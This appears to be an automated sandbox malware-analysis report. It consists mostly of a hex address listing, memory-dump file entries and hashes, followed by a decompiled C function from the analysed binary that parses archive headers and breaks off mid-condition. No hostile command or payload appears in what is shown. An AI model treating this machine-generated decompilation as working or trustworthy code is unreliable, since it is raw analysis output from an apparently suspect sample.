          0x0021c797
          0x0021c79a
          0x0021c7a0
          0x0021c7a3
          0x0021c7a6
          0x0021c7b0
          0x0021c7b0
          0x0021c7b0
          0x0021c7a8
          0x0021c7a8
          0x0021c7aa
          0x00000000
          0x0021c7ac
          0x0021c7ac
          0x0021c7ac
          0x0021c7aa
          0x0021c7b2
          0x0021c7b4
          0x0021c8a9
          0x0021c8a9
          0x0021c8ab
          0x0021c8b1
          0x0021c8b7
          0x0021c8cc
          0x0021c8d1
          0x0021c7ba
          0x0021c7ba
          0x0021c7bc
          0x00000000
          0x0021c7c2
          0x0021c7c4
          0x0021c7c5
          0x0021c7c7
          0x0021c7c9
          0x0021c7cb
          0x0021c7cb
          0x0021c7d1
          0x0021c7d3
          0x0021c7d9
          0x0021c7dc
          0x0021c7ea
          0x0021c7f0
          0x0021c7f0
          0x0021c7f2
          0x0021c7f5
          0x0021c7fb
          0x0021c7fb
          0x0021c7fd
          0x00000000
          0x00000000
          0x0021c7ff
          0x0021c801
          0x0021c807
          0x0021c807
          0x0021c803
          0x0021c803
          0x0021c803
          0x0021c80c
          0x0021c80e
          0x0021c81b
          0x0021c81b
          0x0021c810
          0x0021c816
          0x0021c816
          0x0021c839
          0x0021c841
          0x0021c848
          0x0021c84f
          0x0021c850
          0x0021c853
          0x0021c859
          0x0021c85f
          0x0021c862
          0x0021c864
          0x00000000
          0x0021c864
          0x00000000
          0x0021c862
          0x0021c86c
          0x0021c872
          0x0021c872
          0x0021c878
          0x0021c87a
          0x0021c884
          0x0021c886
          0x0021c886
          0x0021c886
          0x0021c888
          0x0021c88f
          0x0021c894
          0x0021c8a1
          0x0021c896
          0x0021c899
          0x0021c899
          0x0021c894
          0x0021c7bc
          0x0021c8d4
          0x0021c8df
          0x0021c8e0
          0x0021c8e1
          0x0021c8e7
          0x0021c8ed
          0x0021c8f3
          0x0021c8f3
          0x00000000
          0x0021c72c
          0x00000000
          0x0021c712
          0x0021c8f4
          0x0021c8fa
          0x0021c901
          0x0021c902
          0x0021c903
          0x0021c908
          0x0021c908
          0x0021cd6c
          0x0021cd76
          0x0021cd77
          0x0021cd7d
          0x0021cd7f
          0x0021d1e8
          0x0021d1ea
          0x0021d1ec
          0x0021d1f2
          0x0021d1f4
          0x0021d1fa
          0x0021d1fc
          0x0021d54e
          0x0021d54e
          0x0021d550
          0x0021d556
          0x0021d55d
          0x0021d563
          0x0021d565
          0x0021d603
          0x0021d603
          0x0021d605
          0x0021d606
          0x0021d60c
          0x00000000
          0x0021d56b
          0x0021d56b
          0x0021d56e
          0x0021d574
          0x0021d57a
          0x0021d57c
          0x0021d582
          0x0021d584
          0x0021d584
          0x0021d586
          0x0021d586
          0x0021d58f
          0x0021d596
          0x0021d59c
          0x0021d59f
          0x0021d5a0
          0x0021d5a2
          0x0021d5a2
          0x0021d5a6
          0x0021d5a8
          0x0021d5aa
          0x0021d5b0
          0x0021d5b3
          0x00000000
          0x0021d5b5
          0x0021d5b5
          0x0021d5bc
          0x0021d5bc
          0x0021d5b3
          0x0021d5a8
          0x0021d57c
          0x0021d56e
          0x0021d565
          0x0021d202
          0x0021d202
          0x0021d202
          0x0021d205
          0x0021d209
          0x0021d209
          0x0021d20a
          0x0021d21c
          0x0021d229
          0x0021d238
          0x0021d262
          0x0021d267
          0x0021d26d
          0x0021d270
          0x0021d276
          0x0021d279
          0x0021d312
          0x0021d319
          0x0021d397
          0x0021d39d
          0x0021d3a3
          0x0021d3a6
          0x0021d3a8
          0x0021d431
          0x0021d3ae
          0x0021d3ae
          0x0021d3b4
          0x0021d3b4
          0x0021d3ba
          0x0021d3c0
          0x0021d3c2
          0x0021d3c4
          0x0021d3c4
          0x0021d3ca
          0x0021d3d0
          0x0021d3d2
          0x0021d3da
          0x0021d3da
          0x0021d3e0
          0x0021d3e2
          0x0021d3e4
          0x0021d3ea
          0x0021d3ec
          0x0021d503
          0x0021d505
          0x0021d50b
          0x0021d50b
          0x0021d50e
          0x0021d50f
          0x00000000
          0x0021d3f2
          0x0021d3f8
          0x0021d3f8
          0x0021d3fa
          0x0021d400
          0x0021d403
          0x0021d40a
          0x0021d410
          0x0021d412
          0x0021d439
          0x0021d43b
          0x0021d43d
          0x0021d43f
          0x0021d445
          0x0021d44b
          0x0021d4e5
          0x0021d4e5
          0x0021d4e8
          0x00000000
          0x0021d4ee
          0x0021d4ee
          0x0021d4f4
          0x00000000
          0x0021d4f4
          0x0021d451
          0x0021d451
          0x0021d451
          0x0021d454
          0x00000000
          0x00000000
          0x0021d456
          0x0021d458
          0x0021d45a
          0x0021d463
          0x0021d463
          0x0021d465
          0x0021d46b
          0x0021d46b
          0x0021d477
          0x0021d482
          0x0021d485
          0x0021d492
          0x0021d495
          0x0021d496
          0x0021d497
          0x0021d49d
          0x0021d49f
          0x0021d4a5
          0x0021d4ab
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x0021d4ad
          0x0021d4ad
          0x0021d4ad
          0x0021d4af
          0x00000000
          0x00000000
          0x0021d4b1
          0x0021d4b4
          0x00000000
          0x0021d4ba
          0x0021d4ba
          0x0021d4bc
          0x0021d4be
          0x0021d4be
          0x0021d4be
          0x0021d4c6
          0x0021d4c9
          0x0021d4c9
          0x0021d4cf
          0x0021d4d1
          0x0021d4d3
          0x0021d4da
          0x0021d4e0
          0x0021d4e2
          0x00000000
          0x0021d4e2
          0x00000000
          0x0021d4b4
          0x00000000
          0x0021d4ad
          0x00000000
          0x0021d451
          0x0021d414
          0x0021d414
          0x0021d416
          0x0021d41c
          0x0021d423
          0x0021d423
          0x0021d426
          0x0021d426
          0x00000000
          0x0021d416
          0x00000000
          0x0021d4fa
          0x0021d4fa
          0x0021d4fb
          0x0021d4fb
          0x00000000
          0x0021d400
          0x0021d31b
          0x0021d31b
          0x0021d32d
          0x0021d33c
          0x0021d341
          0x0021d344
          0x0021d346
          0x00000000
          0x0021d34c
          0x0021d34c
          0x0021d34f
          0x00000000
          0x0021d355
          0x0021d355
          0x0021d35c
          0x00000000
          0x0021d362
          0x0021d368
          0x0021d36a
          0x0021d370
          0x0021d370
          0x0021d372
          0x0021d372
          0x0021d374
          0x0021d37d
          0x0021d384
          0x0021d387
          0x0021d388
          0x0021d38a
          0x0021d38a
          0x00000000
          0x0021d392
          0x0021d35c
          0x0021d34f
          0x0021d346
          0x0021d27f
          0x0021d27f
          0x0021d285
          0x0021d287
          0x0021d2a3
          0x0021d2a6
          0x00000000
          0x0021d2ac
          0x0021d2ac
          0x0021d2b3
          0x00000000
          0x0021d2b9
          0x0021d2bf
          0x0021d2c1
          0x0021d2c7
          0x0021d2c7
          0x0021d2c9
          0x0021d2c9
          0x0021d2cb
          0x0021d2d4
          0x0021d2db
          0x0021d2de
          0x0021d2df
          0x0021d2e1
          0x0021d2e1
          0x0021d2e9
          0x0021d2e9
          0x0021d2eb
          0x00000000
          0x0021d2f1
          0x0021d2f1
          0x0021d2f7
          0x0021d2fa
          0x0021d5c4
          0x0021d5c7
          0x0021d5cd
          0x0021d5e2
          0x0021d5e7
          0x0021d5ea
          0x0021d300
          0x0021d300
          0x0021d307
          0x00000000
          0x0021d307
          0x0021d2fa
          0x0021d2eb
          0x0021d2b3
          0x0021d289
          0x0021d289
          0x0021d28b
          0x0021d291
          0x0021d297
          0x0021d298
          0x0021d515
          0x0021d515
          0x0021d51c
          0x0021d51d
          0x0021d51e
          0x0021d523
          0x0021d526
          0x0021d526
          0x0021d526
          0x0021d287
          0x0021d528
          0x0021d528
          0x0021d52a
          0x0021d5f1
          0x0021d5f8
          0x0021d5ff
          0x0021d612
          0x0021d618
          0x0021d619
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x0021d530
          0x0021d536
          0x0021d536
          0x0021d53c
          0x0021d53c
          0x0021d548
          0x00000000
          0x0021d548
          0x0021cd85
          0x0021cd85
          0x0021cd87
          0x0021cd8d
          0x0021cd8f
          0x0021cd95
          0x0021cd97
          0x0021d10e
          0x0021d10e
          0x0021d110
          0x0021d116
          0x0021d11d
          0x0021d11f
          0x0021d17e
          0x0021d181
          0x0021d187
          0x0021d18d
          0x0021d193
          0x0021d195
          0x0021d19b
          0x0021d19d
          0x0021d19d
          0x0021d19f
          0x0021d19f
          0x0021d1a1
          0x0021d1aa
          0x0021d1b1
          0x0021d1b4
          0x0021d1b5
          0x0021d1b7
          0x0021d1b7
          0x0021d1bf
          0x0021d1c1
          0x0021d1c7
          0x0021d1cd
          0x0021d1d0
          0x00000000
          0x0021d1d6
          0x0021d1d6
          0x0021d1dd
          0x0021d1dd
          0x0021d1d0
          0x0021d1c1
          0x0021d195
          0x0021d121
          0x0021d121
          0x0021d123
          0x0021d129
          0x0021d12f
          0x00000000
          0x0021d12f
          0x0021d11f
          0x0021cd9d
          0x0021cd9d
          0x0021cd9d
          0x0021cda0
          0x0021cda4
          0x0021cda4
          0x0021cda5
          0x0021cdb7
          0x0021cdc4
          0x0021cdd3
          0x0021cdfd
          0x0021ce02
          0x0021ce08
          0x0021ce0b
          0x0021ce11
          0x0021ce14
          0x0021ce90
          0x0021ce97
          0x0021cf5b
          0x0021cf61
          0x0021cf67
          0x0021cf6a
          0x0021cf6c
          0x0021cff5
          0x0021cf72
          0x0021cf72
          0x0021cf78
          0x0021cf78
          0x0021cf7e
          0x0021cf84
          0x0021cf86
          0x0021cf88
          0x0021cf88
          0x0021cf8e
          0x0021cf94
          0x0021cf96
          0x0021cf9e
          0x0021cf9e
          0x0021cfa4
          0x0021cfa6
          0x0021cfa8
          0x0021cfae
          0x0021cfb0
          0x0021d0c7
          0x0021d0c9
          0x0021d0cf
          0x0021d0cf
          0x00000000
          0x0021cfb6
          0x0021cfbc
          0x0021cfbc
          0x0021cfbe
          0x0021cfc4
          0x0021cfc7
          0x0021cfce
          0x0021cfd4
          0x0021cfd6
          0x0021cffd
          0x0021cfff
          0x0021d001
          0x0021d003
          0x0021d009
          0x0021d00f
          0x0021d0a9
          0x0021d0a9
          0x0021d0ac
          0x00000000
          0x0021d0b2
          0x0021d0b2
          0x0021d0b8
          0x00000000
          0x0021d0b8
          0x0021d015
          0x0021d015
          0x0021d015
          0x0021d018
          0x00000000
          0x00000000
          0x0021d01a
          0x0021d01c
          0x0021d01e
          0x0021d027
          0x0021d027
          0x0021d029
          0x0021d02f
          0x0021d02f
          0x0021d03b
          0x0021d046
          0x0021d049
          0x0021d056
          0x0021d059
          0x0021d05a
          0x0021d05b
          0x0021d061
          0x0021d063
          0x0021d069
          0x0021d06f
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x0021d071
          0x0021d071
          0x0021d071
          0x0021d073
          0x00000000
          0x00000000
          0x0021d075
          0x0021d078
          0x0021d132
          0x0021d132
          0x0021d134
          0x0021d13a
          0x0021d140
          0x0021d141
          0x00000000
          0x0021d07e
          0x0021d07e
          0x0021d080
          0x0021d082
          0x0021d082
          0x0021d082
          0x0021d08a
          0x0021d08d
          0x0021d08d
          0x0021d093
          0x0021d095
          0x0021d097
          0x0021d09e
          0x0021d0a4
          0x0021d0a6
          0x00000000
          0x0021d0a6
          0x00000000
          0x0021d078
          0x00000000
          0x0021d071
          0x00000000
          0x0021d015
          0x0021cfd8
          0x0021cfd8
          0x0021cfda
          0x0021cfe0
          0x0021cfe7
          0x0021cfe7
          0x0021cfea
          0x0021cfea
          0x00000000
          0x0021cfda
          0x00000000
          0x0021d0be
          0x0021d0be
          0x0021d0bf
          0x0021d0bf
          0x00000000
          0x0021cfc4
          0x0021ce9d
          0x0021ce9d
          0x0021ceaf
          0x0021cebe
          0x0021cec3
          0x0021cec6
          0x0021cec8
          0x0021cee4
          0x0021cee7
          0x00000000
          0x0021ceed
          0x0021ceed
          0x0021cef4
          0x00000000
          0x0021cefa
          0x0021cf00
          0x0021cf02
          0x0021cf08
          0x0021cf08
          0x0021cf0a
          0x0021cf0a
          0x0021cf0c
          0x0021cf15
          0x0021cf1c
          0x0021cf1f
          0x0021cf20
          0x0021cf22
          0x0021cf22
          0x00000000
          0x0021cf0a
          0x0021cef4
          0x0021ceca
          0x0021cecc
          0x0021ced2
          0x0021ced8
          0x0021ced9
          0x00000000
          0x0021ced9
          0x0021cec8
          0x0021ce16
          0x0021ce16
          0x0021ce1c
          0x0021ce1e
          0x0021ce33
          0x0021ce36
          0x00000000
          0x0021ce3c
          0x0021ce3c
          0x0021ce43
          0x00000000
          0x0021ce49
          0x0021ce4f
          0x0021ce51
          0x0021ce57
          0x0021ce57
          0x0021ce59
          0x0021ce59
          0x0021ce5b
          0x0021ce64
          0x0021ce6b
          0x0021ce6e
          0x0021ce6f
          0x0021ce71
          0x0021ce71
          0x0021cf2a
          0x0021cf2a
          0x0021cf2c
          0x00000000
          0x0021cf32
          0x0021cf32
          0x0021cf38
          0x0021cf3b
          0x0021ce7e
          0x0021ce85
          0x00000000
          0x0021cf41
          0x0021cf43
          0x0021cf49
          0x0021cf4f
          0x0021cf50
          0x0021d147
          0x0021d147
          0x0021d14e
          0x0021d14f
          0x0021d150
          0x0021d155
          0x0021d158
          0x0021d158
          0x0021cf3b
          0x0021cf2c
          0x0021ce43
          0x0021ce20
          0x0021ce20
          0x0021ce22
          0x0021ce28
          0x0021d0d2
          0x0021d0d2
          0x0021d0d3
          0x0021d0d9
          0x0021d0d9
          0x0021d0e0
          0x0021d0e1
          0x0021d0e2
          0x0021d0e7
          0x0021d0ea
          0x0021d0ea
          0x0021d0ea
          0x0021ce1e
          0x0021d0ec
          0x0021d0ec
          0x0021d0ee
          0x0021d15c
          0x0021d163
          0x0021d163
          0x0021d163
          0x0021d16a
          0x0021d16c
          0x0021d172
          0x0021d173
          0x0021d61f
          0x0021d61f
          0x0021d620
          0x0021d621
          0x0021d626
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x0021d0f0
          0x0021d0f6
          0x0021d0f6
          0x0021d0fc
          0x0021d0fc
          0x0021d108
          0x00000000
          0x0021d108
          0x0021cd97
          0x0021d629
          0x0021d629
          0x0021d62f
          0x0021d631
          0x0021d637
          0x0021d63d
          0x0021d63f
          0x0021d641
          0x0021d643
          0x0021d643
          0x0021d645
          0x0021d645
          0x0021d64e
          0x0021d64f
          0x0021d653
          0x0021d65a
          0x0021d65d
          0x0021d65e
          0x0021d660
          0x0021d660
          0x0021d664
          0x0021d66a
          0x0021d66c
          0x0021d672
          0x0021d674
          0x0021d67a
          0x0021d67d
          0x0021d690
          0x0021d693
          0x0021d699
          0x0021d6ae
          0x0021d6b3
          0x0021d67f
          0x0021d681
          0x0021d688
          0x0021d688
          0x0021d67d
          0x0021d6b6
          0x0021d6b6
          0x0021d6c6
          0x0021d6cf
          0x0021d6d0
          0x0021d6d2
          0x0021d769
          0x0021d76b
          0x0021d776
          0x0021d776
          0x0021d778
          0x0021d77b
          0x0021d77d
          0x00000000
          0x0021d76d
          0x0021d773
          0x0021d773
          0x0021d6d8
          0x0021d6d8
          0x0021d6de
          0x0021d6e1
          0x0021d6e7
          0x0021d6ea
          0x0021d6f0
          0x0021d6f2
          0x0021d6f8
          0x0021d6fa
          0x0021d6fc
          0x0021d6fc
          0x0021d6fe
          0x0021d6fe
          0x0021d70b
          0x0021d712
          0x0021d715
          0x0021d716
          0x0021d718
          0x0021d719
          0x0021d719
          0x0021d71d
          0x0021d723
          0x0021d725
          0x0021d727
          0x0021d72d
          0x0021d730
          0x0021d744
          0x0021d74a
          0x0021d75f
          0x0021d764
          0x0021d732
          0x0021d732
          0x0021d739
          0x0021d739
          0x0021d730
          0x0021d725
          0x0021d783
          0x0021d783
          0x0021d783
          0x0021d78f
          0x0021d792
          0x0021d798
          0x0021d79a
          0x0021d79c
          0x0021d7a2
          0x0021d7a4
          0x0021d7a4
          0x0021d7a4
          0x0021d7a2
          0x0021d7a9
          0x0021d7aa
          0x0021d7ac
          0x0021d7ae
          0x0021d7ae
          0x0021d7b0
          0x0021d7b6
          0x0021d7bc
          0x0021d7be
          0x0021d7c4
          0x0021d7c4
          0x0021d7ca
          0x0021d7cc
          0x00000000
          0x00000000
          0x0021d7d2
          0x0021d7d4
          0x0021d7d6
          0x0021d7d6
          0x0021d7d8
          0x0021d7d8
          0x0021d7e8
          0x0021d7ef
          0x0021d7f2
          0x0021d7f3
          0x0021d7f5
          0x0021d7f5
          0x0021d7f9
          0x0021d7ff
          0x0021d801
          0x0021d803
          0x0021d809
          0x0021d80c
          0x0021d81d
          0x0021d820
          0x0021d826
          0x0021d83b
          0x0021d840
          0x0021d80e
          0x0021d80e
          0x0021d815
          0x0021d815
          0x0021d80c
          0x0021d851
          0x0021d860
          0x0021d861
          0x0021d861
          0x0021d863
          0x0021d865
          0x0021d865
          0x0021d86b
          0x0021d86e
          0x0021d870
          0x0021d872
          0x0021d872
          0x0021d875
          0x0021d876
          0x0021d876
          0x0021d87b
          0x0021d87e
          0x0021d882
          0x0021d882
          0x0021d883
          0x0021d885
          0x0021d88b
          0x0021d891
          0x00000000
          0x00000000
          0x00000000
          0x0021d891
          0x0021d7c4
          0x0021d897
          0x0021d897
          0x00000000
          0x0021d897
          0x0021c61c
          0x0021c613
          0x0021c60a
          0x0021c5c1
          0x0021c5c5
          0x0021c5cd
          0x00000000
          0x0021c5cf
          0x0021c5d5
          0x0021c5da
          0x0021d8b6
          0x0021d8b6
          0x0021d8b9
          0x0021d8c4
          0x0021d8ef
          0x0021d8f0
          0x0021d8f1
          0x0021d8f2
          0x0021d8f3
          0x0021d8f4
          0x0021d8f9
          0x0021d901
          0x0021d906
          0x0021d90c
          0x0021d911
          0x0021d912
          0x0021d912
          0x0021d912
          0x0021d918
          0x0021d919
          0x0021d919
          0x0021d91c
          0x0021d922
          0x00000000
          0x00000000
          0x0021d924
          0x0021d929
          0x0021d92c
          0x0021d92e
          0x0021d936
          0x0021d938
          0x0021d93a
          0x0021d93f
          0x0021d942
          0x0021d948
          0x0021d94b
          0x0021d94d
          0x0021d94d
          0x0021d94d
          0x0021d94d
          0x0021d94b
          0x0021d950
          0x0021d95c
          0x0021d962
          0x0021d96a
          0x0021d96f
          0x0021d970
          0x0021d975
          0x0021d975
          0x0021d975
          0x0021d975
          0x0021d979
          0x0021d979
          0x0021d97c
          0x0021d983
          0x0021d990
          0x0021d8c6
          0x0021d8c6
          0x0021d8c6
          0x0021d8d0
          0x0021d8d9
          0x0021d8de
          0x0021d8ec
          0x0021d8ec
          0x0021d8c4
          0x0021c5cd

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: __floor_pentium4
          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
          • API String ID: 4168288129-2761157908
          • Opcode ID: eefb148c048d8d794e6ab77443821d363b92523d6ad424ff72d30ca529ba1fb7
          • Instruction ID: d495cd878789d8bd62251e35c2d67440e39e31c5a869a3fd455303e02e2837b3
          • Opcode Fuzzy Hash: eefb148c048d8d794e6ab77443821d363b92523d6ad424ff72d30ca529ba1fb7
          • Instruction Fuzzy Hash: C6C23971E246298FDB25CE289D407EAB7F9EB58304F2541EAD44DE7240E774AED18F40
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F2692, Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 783COMMONCrypto
          Download Yara Rule
          C-Code - Quality: 93%
          			E001F2692(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				unsigned int _t333;
				signed int _t337;
				char _t356;
				signed short _t363;
				signed int _t368;
				signed int _t374;
				signed char _t376;
				signed char _t379;
				char _t396;
				signed int _t397;
				signed int _t401;
				signed char _t415;
				intOrPtr _t416;
				char _t417;
				signed int _t420;
				signed int _t421;
				signed char _t426;
				signed int _t429;
				signed int _t433;
				signed short _t438;
				signed short _t443;
				unsigned int _t448;
				signed int _t451;
				void* _t454;
				signed int _t456;
				signed int _t459;
				void* _t466;
				signed int _t472;
				unsigned int _t476;
				void* _t477;
				void* _t484;
				void* _t485;
				signed char _t491;
				signed int _t505;
				intOrPtr* _t518;
				signed int _t521;
				signed int _t522;
				intOrPtr* _t523;
				signed int _t531;
				signed int _t536;
				signed int _t538;
				unsigned int _t547;
				signed int _t549;
				signed int _t560;
				signed char _t562;
				signed int _t563;
				void* _t586;
				signed int _t590;
				signed int _t602;
				signed int _t604;
				signed int _t606;
				unsigned int _t612;
				signed char _t628;
				signed char _t638;
				signed int _t641;
				unsigned int _t642;
				signed int _t645;
				signed int _t646;
				signed int _t648;
				signed int _t649;
				unsigned int _t651;
				signed int _t655;
				void* _t656;
				void* _t663;
				signed int _t666;
				signed int _t667;
				signed char _t668;
				signed int _t671;
				void* _t673;
				signed int _t679;
				signed int _t680;
				void* _t685;
				signed int _t686;
				signed int _t687;
				signed int _t694;
				signed int _t695;
				intOrPtr _t697;
				void* _t698;
				signed char _t707;

				_t523 = __ecx;
				E0020D870(E00221197, _t698);
				E0020D940();
				_t518 = _t523;
				 *((intOrPtr*)(_t698 + 0x20)) = _t518;
				E001FC223(_t698 + 0x24, _t518);
				 *((intOrPtr*)(_t698 + 0x1c)) = 0;
				 *((intOrPtr*)(_t698 - 4)) = 0;
				_t655 = 7;
				if( *(_t518 + 0x6cbc) == 0) {
					L6:
					 *((char*)(_t698 + 0x5f)) = 0;
					L7:
					E001FC42E(_t638, _t655);
					if( *((intOrPtr*)(_t698 + 0x3c)) != 0) {
						 *(_t518 + 0x21e4) = E001FC269(_t698 + 0x24) & 0x0000ffff;
						 *(_t518 + 0x21f4) = 0;
						_t679 = E001FC251(_t698 + 0x24) & 0x000000ff;
						_t333 = E001FC269(_t698 + 0x24) & 0x0000ffff;
						 *(_t518 + 0x21ec) = _t333;
						 *(_t518 + 0x21f4) = _t333 >> 0x0000000e & 0x00000001;
						_t531 = E001FC269(_t698 + 0x24) & 0x0000ffff;
						 *(_t518 + 0x21f0) = _t531;
						 *(_t518 + 0x21e8) = _t679;
						__eflags = _t531 - _t655;
						if(_t531 >= _t655) {
							_t680 = _t679 - 0x73;
							__eflags = _t680;
							if(_t680 == 0) {
								 *(_t518 + 0x21e8) = 1;
							} else {
								_t694 = _t680 - 1;
								__eflags = _t694;
								if(_t694 == 0) {
									 *(_t518 + 0x21e8) = 2;
								} else {
									_t695 = _t694 - 6;
									__eflags = _t695;
									if(_t695 == 0) {
										 *(_t518 + 0x21e8) = 3;
									} else {
										__eflags = _t695 == 1;
										if(_t695 == 1) {
											 *(_t518 + 0x21e8) = 5;
										}
									}
								}
							}
							_t337 =  *(_t518 + 0x21e8);
							 *(_t518 + 0x21dc) = _t337;
							__eflags = _t337 - 0x75;
							if(_t337 != 0x75) {
								__eflags = _t337 - 1;
								if(_t337 != 1) {
									L23:
									_push(_t531 - 7);
									L24:
									E001FC42E(_t638);
									 *((intOrPtr*)(_t518 + 0x6ca8)) =  *((intOrPtr*)(_t518 + 0x6ca0)) + E001F1901(_t518,  *(_t518 + 0x21f0));
									_t536 =  *(_t518 + 0x21e8);
									asm("adc eax, 0x0");
									 *(_t518 + 0x6cac) =  *(_t518 + 0x6ca4);
									 *(_t698 + 0x50) = _t536;
									__eflags = _t536 - 1;
									if(__eflags == 0) {
										_t656 = _t518 + 0x2208;
										E001FA96C(_t656);
										_t538 = 5;
										memcpy(_t656, _t518 + 0x21e4, _t538 << 2);
										 *(_t518 + 0x221c) = E001FC269(_t698 + 0x24);
										_t638 = E001FC29E(_t698 + 0x24);
										 *(_t518 + 0x2220) = _t638;
										 *(_t518 + 0x6cb5) =  *(_t518 + 0x2210) & 0x00000001;
										 *(_t518 + 0x6cb4) =  *(_t518 + 0x2210) >> 0x00000003 & 0x00000001;
										_t547 =  *(_t518 + 0x2210);
										 *(_t518 + 0x6cb7) = _t547 >> 0x00000002 & 0x00000001;
										 *(_t518 + 0x6cbb) = _t547 >> 0x00000006 & 0x00000001;
										 *(_t518 + 0x6cbc) = _t547 >> 0x00000007 & 0x00000001;
										__eflags = _t638;
										if(_t638 != 0) {
											L119:
											_t356 = 1;
											__eflags = 1;
											L120:
											 *((char*)(_t518 + 0x6cb8)) = _t356;
											 *(_t518 + 0x2224) = _t547 >> 0x00000001 & 0x00000001;
											_t549 = _t547 >> 0x00000004 & 0x00000001;
											__eflags = _t549;
											 *(_t518 + 0x6cb9) = _t547 >> 0x00000008 & 0x00000001;
											 *(_t518 + 0x6cba) = _t549;
											L121:
											_t655 = 7;
											L122:
											_t363 = E001FC34F(_t698 + 0x24, 0);
											__eflags =  *(_t518 + 0x21e4) - (_t363 & 0x0000ffff);
											if( *(_t518 + 0x21e4) == (_t363 & 0x0000ffff)) {
												L132:
												 *((intOrPtr*)(_t698 + 0x1c)) =  *((intOrPtr*)(_t698 + 0x3c));
												goto L133;
											}
											_t368 =  *(_t518 + 0x21e8);
											__eflags = _t368 - 0x79;
											if(_t368 == 0x79) {
												goto L132;
											}
											__eflags = _t368 - 0x76;
											if(_t368 == 0x76) {
												goto L132;
											}
											__eflags = _t368 - 5;
											if(_t368 != 5) {
												L130:
												 *((char*)(_t518 + 0x6cc4)) = 1;
												E001F6E03(0x2300e0, 3);
												__eflags =  *((char*)(_t698 + 0x5f));
												if(__eflags == 0) {
													goto L132;
												}
												E001F6BF5(__eflags, 4, _t518 + 0x1e, _t518 + 0x1e);
												 *((char*)(_t518 + 0x6cc5)) = 1;
												goto L133;
											}
											__eflags =  *(_t518 + 0x45ae);
											if( *(_t518 + 0x45ae) == 0) {
												goto L130;
											}
											_t374 =  *((intOrPtr*)( *_t518 + 0x14))() - _t655;
											__eflags = _t374;
											asm("sbb edx, ecx");
											 *((intOrPtr*)( *_t518 + 0x10))(_t374, _t638, 0);
											 *(_t698 + 0x5e) = 1;
											do {
												_t376 = E001F972B(_t518);
												asm("sbb al, al");
												_t379 =  !( ~_t376) &  *(_t698 + 0x5e);
												 *(_t698 + 0x5e) = _t379;
												_t655 = _t655 - 1;
												__eflags = _t655;
											} while (_t655 != 0);
											__eflags = _t379;
											if(_t379 != 0) {
												goto L132;
											}
											goto L130;
										}
										_t356 = 0;
										__eflags =  *(_t518 + 0x221c);
										if( *(_t518 + 0x221c) == 0) {
											goto L120;
										}
										goto L119;
									}
									if(__eflags <= 0) {
										L115:
										__eflags =  *(_t518 + 0x21ec) & 0x00008000;
										if(( *(_t518 + 0x21ec) & 0x00008000) != 0) {
											 *((intOrPtr*)(_t518 + 0x6ca8)) =  *((intOrPtr*)(_t518 + 0x6ca8)) + E001FC29E(_t698 + 0x24);
											asm("adc dword [ebx+0x6cac], 0x0");
										}
										goto L122;
									}
									__eflags = _t536 - 3;
									if(_t536 <= 3) {
										__eflags = _t536 - 2;
										_t64 = (0 | _t536 != 0x00000002) - 1; // -1
										_t663 = (_t64 & 0xffffdcb0) + 0x45d0 + _t518;
										 *(_t698 + 0x48) = _t663;
										E001FA8D2(_t663, 0);
										_t560 = 5;
										memcpy(_t663, _t518 + 0x21e4, _t560 << 2);
										_t685 =  *(_t698 + 0x48);
										_t666 =  *(_t698 + 0x50);
										_t562 =  *(_t685 + 8);
										 *(_t685 + 0x1098) =  *(_t685 + 8) & 1;
										 *(_t685 + 0x1099) = _t562 >> 0x00000001 & 1;
										 *(_t685 + 0x109b) = _t562 >> 0x00000002 & 1;
										 *(_t685 + 0x10a0) = _t562 >> 0x0000000a & 1;
										__eflags = _t666 - 2;
										if(_t666 != 2) {
											L35:
											_t641 = 0;
											__eflags = 0;
											_t396 = 0;
											L36:
											 *((char*)(_t685 + 0x10f0)) = _t396;
											__eflags = _t666 - 2;
											if(_t666 == 2) {
												L39:
												_t397 = _t641;
												L40:
												 *(_t685 + 0x10fa) = _t397;
												_t563 = _t562 & 0x000000e0;
												__eflags = _t563 - 0xe0;
												 *((char*)(_t685 + 0x10f1)) = 0 | _t563 == 0x000000e0;
												__eflags = _t563 - 0xe0;
												if(_t563 != 0xe0) {
													_t642 =  *(_t685 + 8);
													_t401 = 0x10000 << (_t642 >> 0x00000005 & 0x00000007);
													__eflags = 0x10000;
												} else {
													_t401 = _t641;
													_t642 =  *(_t685 + 8);
												}
												 *(_t685 + 0x10f4) = _t401;
												 *(_t685 + 0x10f3) = _t642 >> 0x0000000b & 0x00000001;
												 *(_t685 + 0x10f2) = _t642 >> 0x00000003 & 0x00000001;
												 *((intOrPtr*)(_t685 + 0x14)) = E001FC29E(_t698 + 0x24);
												 *(_t698 + 0x54) = E001FC29E(_t698 + 0x24);
												 *((char*)(_t685 + 0x18)) = E001FC251(_t698 + 0x24);
												 *(_t685 + 0x1070) = 2;
												 *((intOrPtr*)(_t685 + 0x1074)) = E001FC29E(_t698 + 0x24);
												 *(_t698 + 0x18) = E001FC29E(_t698 + 0x24);
												 *(_t685 + 0x1c) = E001FC251(_t698 + 0x24) & 0x000000ff;
												 *((char*)(_t685 + 0x20)) = E001FC251(_t698 + 0x24) - 0x30;
												 *(_t698 + 0x4c) = E001FC269(_t698 + 0x24) & 0x0000ffff;
												_t415 = E001FC29E(_t698 + 0x24);
												_t645 =  *(_t685 + 0x1c);
												 *(_t698 + 0x58) = _t415;
												 *(_t685 + 0x24) = _t415;
												__eflags = _t645 - 0x14;
												if(_t645 < 0x14) {
													__eflags = _t415 & 0x00000010;
													if((_t415 & 0x00000010) != 0) {
